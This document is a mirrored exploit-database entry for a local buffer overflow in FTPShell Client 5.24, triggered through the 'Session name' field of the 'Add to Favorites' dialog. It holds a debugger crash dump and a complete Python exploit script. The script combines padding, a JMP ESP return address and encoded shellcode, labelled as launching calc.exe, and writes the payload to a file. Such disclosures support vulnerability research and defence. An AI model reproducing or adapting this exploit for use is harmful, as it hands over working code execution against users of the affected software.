FTPShell Client 5.24 – ‘Add to Favorites’ Buffer Overflow

• Exploit Database
• 27 阅读

• 作者： INSECT.B
  日期： 2016-01-04
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39159/

• # Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
  # Google Dork: N/A
  # Date: 2015-01-04
  # Exploit Author: INSECT.B
  #	Twitter : @INSECT.B
  #	Facebook : https://www.facebook.com/B.INSECT00
  #	Blog : http://binsect00.tistory.com
  # Vendor Homepage: www.ftpshell.com
  # Software Link: http://www.ftpshell.com/download.htm
  # Version: 5.24
  # Tested on: Windows7 Ultimate SP1 K x86 
  # CVE : N/A
  
  """
  [+] Type : Buffer Overflow
  [-]	 ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field
  [-]	used to add session to favorites list .
  
  [+]Crash : input 'A' x 1500 to Session name field
  [-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
  [-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
  [-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
  [-] cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00210246
  [-] 41414141 ?????
  """
  
  import struct
  
  junk = "A"*460
  junk2 = "\x90"*248
  
  esp = "\x0B\xD4\xDF\x73" # JMP ESP
  
  #shellcode
  #CMD : calc.exe
  #encoder : Alpha-mix encoder
  #buffer register : esp 
  sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
  "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
  "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
  "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
  "\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
  "\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
  "\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
  "\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
  "\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
  "\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
  "\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
  "\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
  "\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
  "\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
  "\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
  "\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
  "\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
  "\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
  "\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
  "\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
  "\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
  "\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
  "\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
  "\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
  "\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
  "\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
  "\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
  "\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
  "\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
  "\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
  "\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
  "\x73\x55\x75\x50\x41\x41"
  )
  
  
  
  payload = junk + esp + sc + junk2
  
  file=open("C:\\shelll","w")
  file.write(payload)
  file.close()